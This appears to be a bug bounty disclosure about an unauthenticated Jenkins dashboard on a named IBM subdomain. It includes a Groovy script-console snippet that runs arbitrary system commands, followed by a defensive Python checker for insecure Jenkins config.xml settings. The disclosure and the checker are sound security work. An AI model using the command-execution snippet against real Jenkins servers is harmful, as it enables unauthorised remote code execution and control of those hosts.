Remote Code Execution on ibm.com subdomain

Khaled Nassar
Web Developer | Part Time Bug Bounty Hunter- I use VIM btw -

I found that the Jenkins instance on acc11-blr-dev-01.sl1694431.sl.edst.ibm.com does not require authentication to access the dashboard.

What can I do with this?


Everything: add/delete admin accounts, services, configuration, etc.

But the interesting path is /script, where you can write a Jenkins script,
so you can write a script to execute system commands:

def command = "YOUR_COMMAND"
def proc = command.execute()
proc.waitFor()
println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${proc.in.text}"
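
For operators, the condition described above (dashboard and /script reachable without login) can be checked in a Jenkins controller's own config.xml. The following is an added example, not code from the original post; the sample configs are constructed, and the element and class names are those written by Jenkins core and the matrix authorization plugin.

```python
import xml.etree.ElementTree as ET

# Constructed sample config.xml fragments (not taken from any real host).
OPEN_CONFIG = """<hudson>
  <useSecurity>false</useSecurity>
</hudson>"""

MATRIX_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:anonymous</permission>
    <permission>hudson.model.Hudson.Read:authenticated</permission>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm"/>
</hudson>"""

HARDENED_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm"/>
</hudson>"""


def audit_jenkins_config(xml_text):
    """Return findings that leave the dashboard or /script open to anonymous users."""
    root = ET.fromstring(xml_text)
    findings = []
    if (root.findtext("useSecurity") or "").strip().lower() == "false":
        findings.append("useSecurity is false: no login is required for any action")
    authz = root.find("authorizationStrategy")
    cls = authz.get("class", "") if authz is not None else ""
    if cls.endswith("AuthorizationStrategy$Unsecured"):
        findings.append("authorization strategy is Unsecured")
    if cls.endswith("FullControlOnceLoggedInAuthorizationStrategy"):
        if (authz.findtext("denyAnonymousReadAccess") or "").strip().lower() != "true":
            findings.append("anonymous read access to the dashboard is allowed")
    if authz is not None:
        for perm in authz.iter("permission"):
            parts = (perm.text or "").strip().split(":")
            # Entries look like PERMISSION:sid, or TYPE:PERMISSION:sid in newer plugin versions.
            if parts[-1] == "anonymous" and any(p.endswith("Hudson.Administer") for p in parts):
                findings.append("anonymous holds Overall/Administer (script console reachable)")
    realm = root.find("securityRealm")
    if realm is not None and realm.get("class", "").endswith("SecurityRealm$None"):
        findings.append("security realm is None: no login is possible or required")
    return findings
```

An empty list means none of these settings were found; any finding means the controller should not be reachable from untrusted networks until authentication and authorization are enforced.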

Thanks
